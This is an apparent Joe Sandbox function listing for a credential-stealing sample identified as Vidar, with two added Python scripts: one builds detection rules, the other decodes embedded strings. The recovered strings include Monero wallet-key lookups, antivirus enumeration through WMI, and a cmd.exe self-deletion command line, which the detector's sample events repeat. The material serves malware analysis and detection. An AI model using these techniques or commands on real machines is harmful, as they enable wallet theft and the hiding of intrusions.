• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectSizelstrlenmemset
• String ID: image/jpeg
• API String ID: 2149350297-3785015651
• Opcode ID: b650668eca8d860c30a9b2470f2ad4acd965bcb7ac73d5492cb1c3e682c3a281
• Instruction ID: a3dc9755a87ad3119d60122da0acc543085f77602f776508529631999e36f680
• Opcode Fuzzy Hash: b650668eca8d860c30a9b2470f2ad4acd965bcb7ac73d5492cb1c3e682c3a281
• Instruction Fuzzy Hash: E651EA72905118BFDB02AFE0EC49DEE7FBDEF45351B004025F906E6160EB319A96DBA1
APIs
• memset.MSVCRT ref: 00341C76
  • Part of subcall function 003412A0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412B4
  • Part of subcall function 003412A0: HeapAlloc.KERNEL32(00000000,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412BB
  • Part of subcall function 003412A0: RegOpenKeyExA.KERNEL32(?,?,00000000,00020119,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412D4
  • Part of subcall function 003412A0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8), ref: 003412ED
  • Part of subcall function 003412A0: RegCloseKey.ADVAPI32(?,?,?,?,00341C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000,000003E8,?), ref: 003412F6
• lstrcatA.KERNEL32(?,00000000), ref: 00341C9A
• lstrlenA.KERNEL32(?), ref: 00341CA7
• lstrcatA.KERNEL32(?,.keys), ref: 00341CC2
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00341DA7
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 003469A2: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00361ECC), ref: 003469C0
  • Part of subcall function 003469A2: GetFileSizeEx.KERNEL32(00000000,?), ref: 003469D7
  • Part of subcall function 003469A2: LocalAlloc.KERNEL32(00000040,?,?,0035E266), ref: 003469F3
  • Part of subcall function 003469A2: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,0035E266), ref: 00346A0D
  • Part of subcall function 003469A2: CloseHandle.KERNEL32(?), ref: 00346A2E
• DeleteFileA.KERNEL32(00000000), ref: 00341E11
• memset.MSVCRT ref: 00341E2F
  • Part of subcall function 003526F8: _MSFOpenExW.MSPDB140-MSVCRT ref: 003527A0
  • Part of subcall function 003526F8: CreateThread.KERNEL32(00000000,00000000,0035165F,?,00000000,00000000), ref: 003527B5
  • Part of subcall function 003526F8: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003527BD
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeapOpenlstrlenmemset$CopyDeleteHandleLocalObjectProcessQueryReadSingleSizeSystemThreadTimeValueWait
• String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$f5$wallet_path
• API String ID: 2375508334-1661993177
• Opcode ID: e36ed64e814139065d5d02c4f052e4770d6519f74b2fca29af11f3642f6efb42
• Instruction ID: ca98922203ab2f3fcaf22d74bd5ed11d2ad639208e550a48fbb79fdad147912b
• Opcode Fuzzy Hash: e36ed64e814139065d5d02c4f052e4770d6519f74b2fca29af11f3642f6efb42
• Instruction Fuzzy Hash: 9551E772900119AADF06FBE0DD96DEE77BCBF14304F400565F506BE0A1EE34AA49CB91
APIs
• _EH_prolog.MSVCRT ref: 0034F498
• CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F4AD
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F4BE
• CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F4D8
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F50E
• VariantInit.OLEAUT32(?), ref: 0034F55D
  • Part of subcall function 0034F7BB: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,0034F580,?), ref: 0034F7C3
  • Part of subcall function 0034F7BB: CharToOemW.USER32(?,00000000), ref: 0034F7CF
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• VariantClear.OLEAUT32(?), ref: 0034F58E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
• String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
• API String ID: 3694693100-2561087649
• Opcode ID: 77880c277254990a1bb35ef745aa56b67460514400af34b5622e388cc7fc3c83
• Instruction ID: c0106d8ba451e63e454fbc678baa3e64ab1e318a943386591ee49f7055b309ca
• Opcode Fuzzy Hash: 77880c277254990a1bb35ef745aa56b67460514400af34b5622e388cc7fc3c83
• Instruction Fuzzy Hash: 7D314771A01225ABCB15DF95CC49EEFBFBDEF4AB61F148155F505AA290C770AB00CBA0
APIs
• memset.MSVCRT ref: 003518C9
• memset.MSVCRT ref: 003518D5
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 003518EA
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• ShellExecuteEx.SHELL32(?), ref: 003519E9
• memset.MSVCRT ref: 003519F6
• memset.MSVCRT ref: 00351A04
• ExitProcess.KERNEL32 ref: 00351A15
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
• String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
• API String ID: 1943017432-1686486140
• Opcode ID: a7c51a0355d0f769579ce2c80441a3d4d1ae7066b20023d2e0c153e4c7d880cc
• Instruction ID: f8b746994837a216ed18c992cb1532dab02d6b23bdc051ffdbee2a4e6eff7d8b
• Opcode Fuzzy Hash: a7c51a0355d0f769579ce2c80441a3d4d1ae7066b20023d2e0c153e4c7d880cc
• Instruction Fuzzy Hash: 57410D71C00119ABCB06EBE0DC96DDEB7BCBF25700F414166F506BA091EB74AB49CB94
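Added detection example, not part of the Joe Sandbox report and not Vidar's own code. It turns the strings recovered in the three entries above into host-telemetry rules: the Monero `wallet_path` / `\Monero\wallet.keys` lookup, the `Select * From AntiVirusProduct` WQL query against `root\SecurityCenter2`, and the delayed `cmd.exe /c timeout /t 10 & del /f /q "…" & rd /s /q "C:\ProgramData\…" & exit` self-deletion launched through ShellExecuteEx. The event schema, the two allowlists, the sample paths and the `ABCDEFGH` ProgramData folder name are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass


# Assumed (hypothetical) telemetry schema; not a Joe Sandbox or EDR format.
@dataclass
class Event:
    kind: str          # "process", "wmi_query", "registry_read" or "file_read"
    image: str         # full path of the process performing the action
    detail: str        # command line, WQL text, registry value path or file path
    parent: str = ""   # parent image for process events
    context: str = ""  # WMI namespace for wmi_query events


@dataclass
class Finding:
    rule: str
    image: str
    evidence: str


# Routine at 003518C9: the fragments '/c timeout /t 10 & del /f /q "',
# '" & rd /s /q "C:\ProgramData\' and '" & exit' are concatenated into a
# cmd.exe line, run via ShellExecuteEx, and the stealer calls ExitProcess.
SELF_DELETE_RE = re.compile(
    r'timeout\s+/t\s+\d+\s*&\s*(?:del\s+/f\s+/q\s+"[^"]+"'
    r'|rd\s+/s\s+/q\s+"C:\\ProgramData\\[^"]*")',
    re.IGNORECASE,
)

# Routine at 0034F498: COM/WMI connection to root\SecurityCenter2 and the WQL
# query 'Select * From AntiVirusProduct', reading displayName of each product.
WMI_AV_RE = re.compile(r"select\s+\*\s+from\s+antivirusproduct", re.IGNORECASE)
# Processes expected to run this query on a normal host (assumed allowlist).
AV_QUERY_ALLOWLIST = {"securityhealthservice.exe", "securityhealthsystray.exe"}

# First entry above: key SOFTWARE\monero-project\monero-core, value wallet_path,
# and the file name \Monero\wallet.keys.
MONERO_RE = re.compile(r"monero-project\\monero-core|\\Monero\\wallet\.keys", re.IGNORECASE)
MONERO_ALLOWLIST = {"monero-wallet-gui.exe", "monero-wallet-cli.exe"}  # assumed


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Return one Finding per event matching a behaviour recovered above."""
    findings = []
    for ev in events:
        img = _basename(ev.image)
        if ev.kind == "process" and img == "cmd.exe" and SELF_DELETE_RE.search(ev.detail):
            # Attribute to the parent: that is the binary deleting itself.
            findings.append(Finding("vidar_self_delete_cmd", ev.parent, ev.detail))
        elif (ev.kind == "wmi_query"
              and ev.context.lower().endswith("securitycenter2")
              and WMI_AV_RE.search(ev.detail)
              and img not in AV_QUERY_ALLOWLIST):
            findings.append(Finding("av_enum_securitycenter2", ev.image, ev.detail))
        elif (ev.kind in ("registry_read", "file_read")
              and MONERO_RE.search(ev.detail)
              and img not in MONERO_ALLOWLIST):
            findings.append(Finding("monero_wallet_discovery", ev.image, ev.detail))
    return findings


# Constructed sample telemetry (not taken from the report); the paths and the
# ProgramData folder name ABCDEFGH are placeholders.
SAMPLE = r"C:\Users\victim\AppData\Local\Temp\bind.aspx.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    Event("process", CMD, parent=SAMPLE,
          detail=f'"{CMD}" /c timeout /t 10 & del /f /q "{SAMPLE}" & rd /s /q "C:\\ProgramData\\ABCDEFGH" & exit'),
    Event("process", CMD, parent=SAMPLE,
          detail=f'"{CMD}" /c timeout /t 10 & rd /s /q "C:\\ProgramData\\ABCDEFGH" & exit'),
    Event("process", CMD, parent=r"C:\Windows\explorer.exe", detail=f'"{CMD}" /c dir'),
    Event("wmi_query", SAMPLE, context=r"root\SecurityCenter2",
          detail="Select * From AntiVirusProduct"),
    Event("wmi_query", r"C:\Windows\System32\SecurityHealthService.exe",
          context=r"root\SecurityCenter2", detail="Select * From AntiVirusProduct"),
    Event("registry_read", SAMPLE, detail=r"HKCU\SOFTWARE\monero-project\monero-core\wallet_path"),
    Event("file_read", r"C:\Program Files\Monero\monero-wallet-gui.exe",
          detail=r"C:\Users\victim\Documents\Monero\wallet.keys"),
]


def run_sample() -> list:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.rule:26s} {f.image}\n    {f.evidence}")
```

The self-delete rule keys on the `timeout /t N & del /f /q "…"` and `rd /s /q "C:\ProgramData\…"` shapes rather than on the whole line, since the timeout value and the dropped folder name vary between samples; the WMI and wallet rules need the allowlists because the Windows Security service and the real Monero wallet perform the same operations legitimately.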
APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00361ECC), ref: 0034F095
• GetVolumeInformationA.KERNEL32(nK5,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0034F0C7
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F10A
• HeapAlloc.KERNEL32(00000000), ref: 0034F111
• wsprintfA.USER32 ref: 0034F13E
• lstrcatA.KERNEL32(00000000,003618B0), ref: 0034F14D
  • Part of subcall function 0034EFBA: GetCurrentHwProfileA.ADVAPI32(?), ref: 0034EFCA
  • Part of subcall function 0034EFBA: memset.MSVCRT ref: 0034EFF5
  • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,00000000), ref: 0034F025
  • Part of subcall function 0034EFBA: lstrcatA.KERNEL32(?,003618AC), ref: 0034F03F
• lstrlenA.KERNEL32(00000000), ref: 0034F166
  • Part of subcall function 0034FC4F: malloc.MSVCRT ref: 0034FC58
  • Part of subcall function 0034FC4F: strncpy.MSVCRT ref: 0034FC68
• lstrcatA.KERNEL32(00000000,00000000), ref: 0034F190
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocmemsetstrncpywsprintf
• String ID: C$nK5$nK5:\
• API String ID: 3155998020-3949516349
• Opcode ID: c4f83ac31395b7594c975443d85c01768adb6d8b9d9dfd9aedbbc0ecfaf45e00
• Instruction ID: f422364e66fe7ddcbcd5183456f7cc34ce62f604d8812f5579203c17edfe9d10
• Opcode Fuzzy Hash: c4f83ac31395b7594c975443d85c01768adb6d8b9d9dfd9aedbbc0ecfaf45e00
• Instruction Fuzzy Hash: 983178B6C00108AEDB02EBF4CD85CEE7BBCEF44344F1000A5F606AA011EA35AF45CBA0
APIs
                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,00361ECC), ref: 0034E310
                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00361ECC), ref: 0034E331
                                                                                                                                                                                      • memset.MSVCRT ref: 0034E373
                                                                                                                                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0034E4A5
                                                                                                                                                                                        • Part of subcall function 0034CEAE: strlen.MSVCRT ref: 0034CEC5
                                                                                                                                                                                        • Part of subcall function 0034CA67: memcpy.MSVCRT(?,?,?,?,?,?,?,0034CBEE,00000001,?,?,?,0034CE77,?,00000000,-00000001), ref: 0034CA87
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0034E38B, 0034E46D
                                                                                                                                                                                      • N0ZWFt, xrefs: 0034E412, 0034E41F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: OpenProcessmemcpymemsetstrlen
                                                                                                                                                                                      • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                      • API String ID: 4248304612-1622206642
                                                                                                                                                                                      • Opcode ID: 9f53ad56f5f82096583530d6c5c633a5f7e53314a61b01f69d05be1775087c8f
                                                                                                                                                                                      • Instruction ID: 30b47054892419ea484bc87a34173efe8d55334de6b222188d9642b63a13ecb8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f53ad56f5f82096583530d6c5c633a5f7e53314a61b01f69d05be1775087c8f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2151B071E00209AEDB16EF90CC81EEDBBBCEF04714F144169F515AB291DB746E88DB61
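The two strings attached to the OpenProcess routine above are encoded twice: the report prints the first as a space-separated hex dump of ASCII bytes, and those bytes are themselves unpadded base64. The script below is an added example, not part of the Joe Sandbox report or of the sample; its REPORT_* inputs are copied verbatim from the "Strings" entries, and the helper functions are illustrative. It decodes both layers and shows that the hex string is the base64 form of the JSON object `{ "typ": "JWT", "alg": "EdDSA" }`. The second string, `N0ZWFt`, does not decode cleanly at byte alignment on its own; the script assumes it is a substring cut from a longer base64 string and tries the three possible bit alignments, which is an assumption made here, not something the report states. For context on the constants in this listing, `001FFFFF` passed to OpenProcess is the Vista-and-later PROCESS_ALL_ACCESS mask.

```python
"""Decode the string artifacts shown in the function listing.

Added example for this report. REPORT_HEX and REPORT_FRAGMENT are copied
from the "Strings" entries of the OpenProcess routine; every helper below
is illustrative code and not part of the sample or of Joe Sandbox.
"""
import base64
import json

# Copied verbatim from the listing (xrefs 0034E38B / 0034E46D).
REPORT_HEX = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 "
              "4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")
# Copied verbatim from the listing (xrefs 0034E412 / 0034E41F).
REPORT_FRAGMENT = "N0ZWFt"


def hex_to_ascii(spaced_hex: str) -> str:
    """Turn the report's space-separated hex dump back into text."""
    return bytes.fromhex(spaced_hex.replace(" ", "")).decode("ascii")


def b64_decode_unpadded(s: str) -> bytes:
    """Decode base64 that was stored without '=' padding.

    Strings carved out of binaries (and JWT segments) usually lack padding,
    so restore it before handing the text to the standard decoder.
    """
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_report_string(spaced_hex: str) -> dict:
    """hex dump -> ASCII base64 -> bytes -> JSON; raises if any layer is wrong."""
    return json.loads(b64_decode_unpadded(hex_to_ascii(spaced_hex)))


def decode_b64_fragment(fragment: str) -> list:
    """Recover printable text from a base64 *substring* (assumption: the
    report's short string is a cut-out of a longer base64 string).

    A substring only decodes at one of three bit alignments. For each
    alignment, prepend 'A' filler (six zero bits per character), decode,
    drop the filler bytes and the byte that straddles the cut, and keep the
    result if it is printable ASCII. Returns (shift, text) pairs; normally
    exactly one alignment survives.
    """
    hits = []
    for shift in range(3):
        padded = "A" * shift + fragment
        # A length of 1 mod 4 is illegal base64; the last character then
        # only carries bits of an incomplete byte, so it can be dropped.
        if len(padded) % 4 == 1:
            padded = padded[:-1]
        raw = b64_decode_unpadded(padded)
        # 6*shift filler bits occupy the first `shift` bytes (shift <= 2),
        # the last of which straddles the cut, so drop exactly `shift` bytes.
        body = raw[shift:]
        try:
            text = body.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text and text.isprintable():
            hits.append((shift, text))
    return hits


if __name__ == "__main__":
    print(hex_to_ascii(REPORT_HEX))
    print(decode_report_string(REPORT_HEX))
    print(decode_b64_fragment(REPORT_FRAGMENT))
```

Run as a script it prints the intermediate base64 text, the decoded JWT header object, and the single alignment at which `N0ZWFt` yields printable text (`team`, with the character before the cut unrecoverable from the fragment alone). The same two helpers work on any hex-dumped or truncated base64 string the report lists.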
APIs
• StrCmpCA.SHLWAPI(00000000,?,?,00361ECC), ref: 0034D95E
• StrCmpCA.SHLWAPI(00000000,?,?,00361ECC), ref: 0034D9BD
• StrCmpCA.SHLWAPI(00000000,firefox), ref: 0034DC90
• StrCmpCA.SHLWAPI(00000000,?,?,00361ECC), ref: 0034DA9D
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
• StrCmpCA.SHLWAPI(00000000), ref: 0034DB51
• StrCmpCA.SHLWAPI(00000000), ref: 0034DBB1
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
